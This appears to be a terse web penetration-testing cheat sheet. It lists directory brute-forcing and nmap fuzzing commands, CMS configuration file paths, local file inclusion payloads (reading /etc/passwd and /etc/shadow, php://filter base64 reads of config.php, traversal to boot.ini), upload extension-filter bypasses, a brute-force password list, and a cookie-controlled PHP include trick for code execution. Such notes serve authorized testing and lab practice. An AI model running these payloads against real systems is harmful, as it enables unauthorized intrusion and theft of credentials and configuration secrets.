Good directory discovery tool:
$ git clone https://github.com/maurosoria/dirsearch.git; cd dirsearch; python3 dirsearch.py -u http://$ip/ -e .php
Directory discovery
$ gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip
Nmap HTTP Form Fuzzer
$ nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip
Nmap Check the server methods
$ nmap --script http-methods --script-args http-methods.url-path='/test' $ip
Test OPTIONS against every folder/file.
Test every GET/POST parameter against SQLI and RCE.
JBoss
JMX Console http://$ip:8080/jmxconcole/ War File
Joomla
configuration.php diagnostics.php joomla.inc.php config.inc.php
Mambo
configuration.php config.inc.php
Wordpress
setup-config.php wp-config.php
Test it:
$ fimap -u "http://$ip/example.php?test="
Interesting payloads:
/etc/passwd | /etc/shadow #instant win
/var/www/html/config.php # or similar paths to get SQL etc creds
?page=php://filter/convert.base64-encode/resource=../config.php
../../../../../boot.ini # to find out windows version*
Good password list
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10_million_password_list_top_1000.txt
Avoid extension checks using tricks like:
.php5.jpeg .php5%00.jpeg
Different file formats
https://en.wikipedia.org/wiki/List_of_file_signatures
You can usually bypass file include filters with payloads like:
php://filter/convert.base64-encode/resource=file
If you control an include statenent such as
include("lang/".$_COOKIE['lang']);
You can set a cookie pointing to an arbitrary PHP file and have it executed in your page.
Find out potential correct vhost to GET
is the clock skewed
Any names that could be usernames for bruteforce/guessing.
Run strings against every file